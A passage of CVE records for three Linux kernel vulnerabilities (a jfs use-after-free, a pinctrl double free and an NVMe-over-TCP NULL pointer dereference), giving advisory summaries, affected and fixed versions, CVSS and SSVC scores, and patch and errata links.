"url": "https://git.kernel.org/stable/c/bacdaa04251382d7efd4f09f9a0686bfcc297e2e"
},
{
"url": "https://git.kernel.org/stable/c/e0e1958f4c365e380b17ccb35617345b31ef7bf3"
}
],
"title": "jfs: fix uaf in jfs_evict_inode",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52600",
"datePublished": "2024-03-06T06:45:28.198Z",
"dateReserved": "2024-03-02T21:55:42.573Z",
"dateUpdated": "2025-05-04T07:39:32.864Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36940 (GCVE-0-2024-36940)
Vulnerability from cvelistv5
Published
2024-05-30 15:29
Modified
2025-05-04 09:12
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
pinctrl: core: delete incorrect free in pinctrl_enable()
The "pctldev" struct is allocated in devm_pinctrl_register_and_init().
It's a devm_ managed pointer that is freed by devm_pinctrl_dev_release(),
so freeing it in pinctrl_enable() will lead to a double free.
The devm_pinctrl_dev_release() function frees the pindescs and destroys
the mutex as well.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 6118714275f0a313ecc296a87ed1af32d9691bed Version: 6118714275f0a313ecc296a87ed1af32d9691bed Version: 6118714275f0a313ecc296a87ed1af32d9691bed Version: 6118714275f0a313ecc296a87ed1af32d9691bed Version: 6118714275f0a313ecc296a87ed1af32d9691bed Version: 6118714275f0a313ecc296a87ed1af32d9691bed Version: 6118714275f0a313ecc296a87ed1af32d9691bed Version: 6118714275f0a313ecc296a87ed1af32d9691bed |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36940",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-05T14:25:26.979822Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-05T14:25:33.588Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:43:50.606Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/735f4c6b6771eafe336404c157ca683ad72a040d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cdaa171473d98962ae86f2a663d398fda2fbeefd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/288bc4aa75f150d6f1ee82dd43c6da1b438b6068"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/41f88ef8ba387a12f4a2b8c400b6c9e8e54b2cca"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ac7d65795827dc0cf7662384ed27caf4066bd72e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/558c8039fdf596a584a92c171cbf3298919c448c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f9f1e321d53e4c5b666b66e5b43da29841fb55ba"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5038a66dad0199de60e5671603ea6623eb9e5c79"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/pinctrl/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "735f4c6b6771eafe336404c157ca683ad72a040d",
"status": "affected",
"version": "6118714275f0a313ecc296a87ed1af32d9691bed",
"versionType": "git"
},
{
"lessThan": "cdaa171473d98962ae86f2a663d398fda2fbeefd",
"status": "affected",
"version": "6118714275f0a313ecc296a87ed1af32d9691bed",
"versionType": "git"
},
{
"lessThan": "288bc4aa75f150d6f1ee82dd43c6da1b438b6068",
"status": "affected",
"version": "6118714275f0a313ecc296a87ed1af32d9691bed",
"versionType": "git"
},
{
"lessThan": "41f88ef8ba387a12f4a2b8c400b6c9e8e54b2cca",
"status": "affected",
"version": "6118714275f0a313ecc296a87ed1af32d9691bed",
"versionType": "git"
},
{
"lessThan": "ac7d65795827dc0cf7662384ed27caf4066bd72e",
"status": "affected",
"version": "6118714275f0a313ecc296a87ed1af32d9691bed",
"versionType": "git"
},
{
"lessThan": "558c8039fdf596a584a92c171cbf3298919c448c",
"status": "affected",
"version": "6118714275f0a313ecc296a87ed1af32d9691bed",
"versionType": "git"
},
{
"lessThan": "f9f1e321d53e4c5b666b66e5b43da29841fb55ba",
"status": "affected",
"version": "6118714275f0a313ecc296a87ed1af32d9691bed",
"versionType": "git"
},
{
"lessThan": "5038a66dad0199de60e5671603ea6623eb9e5c79",
"status": "affected",
"version": "6118714275f0a313ecc296a87ed1af32d9691bed",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/pinctrl/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.11"
},
{
"lessThan": "4.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.314",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.276",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.314",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.276",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\npinctrl: core: delete incorrect free in pinctrl_enable()\n\nThe \"pctldev\" struct is allocated in devm_pinctrl_register_and_init().\nIt\u0027s a devm_ managed pointer that is freed by devm_pinctrl_dev_release(),\nso freeing it in pinctrl_enable() will lead to a double free.\n\nThe devm_pinctrl_dev_release() function frees the pindescs and destroys\nthe mutex as well."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:12:30.088Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/735f4c6b6771eafe336404c157ca683ad72a040d"
},
{
"url": "https://git.kernel.org/stable/c/cdaa171473d98962ae86f2a663d398fda2fbeefd"
},
{
"url": "https://git.kernel.org/stable/c/288bc4aa75f150d6f1ee82dd43c6da1b438b6068"
},
{
"url": "https://git.kernel.org/stable/c/41f88ef8ba387a12f4a2b8c400b6c9e8e54b2cca"
},
{
"url": "https://git.kernel.org/stable/c/ac7d65795827dc0cf7662384ed27caf4066bd72e"
},
{
"url": "https://git.kernel.org/stable/c/558c8039fdf596a584a92c171cbf3298919c448c"
},
{
"url": "https://git.kernel.org/stable/c/f9f1e321d53e4c5b666b66e5b43da29841fb55ba"
},
{
"url": "https://git.kernel.org/stable/c/5038a66dad0199de60e5671603ea6623eb9e5c79"
}
],
"title": "pinctrl: core: delete incorrect free in pinctrl_enable()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36940",
"datePublished": "2024-05-30T15:29:28.101Z",
"dateReserved": "2024-05-30T15:25:07.072Z",
"dateUpdated": "2025-05-04T09:12:30.088Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-6536 (GCVE-0-2023-6536)
Vulnerability from cvelistv5
Published
2024-02-07 21:05
Modified
2025-11-06 21:45
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-476 - NULL Pointer Dereference
Summary
A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver, causing kernel panic and a denial of service.
References
| URL | Tags | |||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Red Hat | Red Hat Enterprise Linux 8 |
Unaffected: 0:4.18.0-513.18.1.rt7.320.el8_9 < * cpe:/a:redhat:enterprise_linux:8::realtime cpe:/a:redhat:enterprise_linux:8::nfv |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-6536",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-08T14:26:21.002030Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:22:45.294Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T18:22:01.771Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "RHSA-2024:0723",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0723"
},
{
"name": "RHSA-2024:0724",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0724"
},
{
"name": "RHSA-2024:0725",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0725"
},
{
"name": "RHSA-2024:0881",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0881"
},
{
"name": "RHSA-2024:0897",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0897"
},
{
"name": "RHSA-2024:1248",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1248"
},
{
"name": "RHSA-2024:2094",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2094"
},
{
"name": "RHSA-2024:3810",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3810"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-6536"
},
{
"name": "RHBZ#2254052",
"tags": [
"issue-tracking",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254052"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20240415-0001/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFYW6R64GPLUOXSQBJI3JBUX3HGLAYPP/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::realtime",
"cpe:/a:redhat:enterprise_linux:8::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-513.18.1.rt7.320.el8_9",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::crb",
"cpe:/o:redhat:enterprise_linux:8::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-513.18.1.el8_9",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:8.6::crb",
"cpe:/o:redhat:rhel_eus:8.6::baseos",
"cpe:/o:redhat:rhev_hypervisor:4.4::el8"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.6 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-372.91.1.el8_6",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:8.8::baseos",
"cpe:/a:redhat:rhel_eus:8.8::crb"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.8 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-477.58.1.el8_8",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::nfv",
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/a:redhat:enterprise_linux:9::appstream",
"cpe:/a:redhat:enterprise_linux:9::realtime",
"cpe:/o:redhat:enterprise_linux:9::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-362.24.1.el9_3",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::nfv",
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/a:redhat:enterprise_linux:9::appstream",
"cpe:/a:redhat:enterprise_linux:9::realtime",
"cpe:/o:redhat:enterprise_linux:9::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-362.24.1.el9_3",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.2::appstream",
"cpe:/a:redhat:rhel_eus:9.2::crb",
"cpe:/o:redhat:rhel_eus:9.2::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-284.52.1.el9_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.2::realtime",
"cpe:/a:redhat:rhel_eus:9.2::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-284.52.1.rt14.337.el9_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:8.6::crb",
"cpe:/o:redhat:rhel_eus:8.6::baseos",
"cpe:/o:redhat:rhev_hypervisor:4.4::el8"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-372.91.1.el8_6",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/cluster-logging-operator-bundle",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-22",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/cluster-logging-rhel9-operator",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-11",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch6-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v6.8.1-407",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-operator-bundle",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-19",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-proxy-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v1.0.0-479",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-rhel9-operator",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-7",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/eventrouter-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.4.0-247",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/fluentd-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-5",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/log-file-metric-exporter-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v1.1.0-227",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/logging-curator5-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.1-470",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/logging-loki-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v2.9.6-14",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/logging-view-plugin-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/loki-operator-bundle",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-24",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/loki-rhel9-operator",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-10",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/lokistack-gateway-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.1.0-525",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/opa-openshift-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.1.0-224",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/vector-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.28.1-56",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
}
],
"credits": [
{
"lang": "en",
"value": "Red Hat would like to thank Alon Zahavi for reporting this issue."
}
],
"datePublic": "2023-12-11T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in the Linux kernel\u0027s NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver, causing kernel panic and a denial of service."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Moderate"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-06T21:45:28.671Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"name": "RHSA-2024:0723",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0723"
},
{
"name": "RHSA-2024:0724",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0724"
},
{
"name": "RHSA-2024:0725",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0725"
},
{
"name": "RHSA-2024:0881",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0881"
},
{
"name": "RHSA-2024:0897",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0897"
},
{
"name": "RHSA-2024:1248",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1248"
},
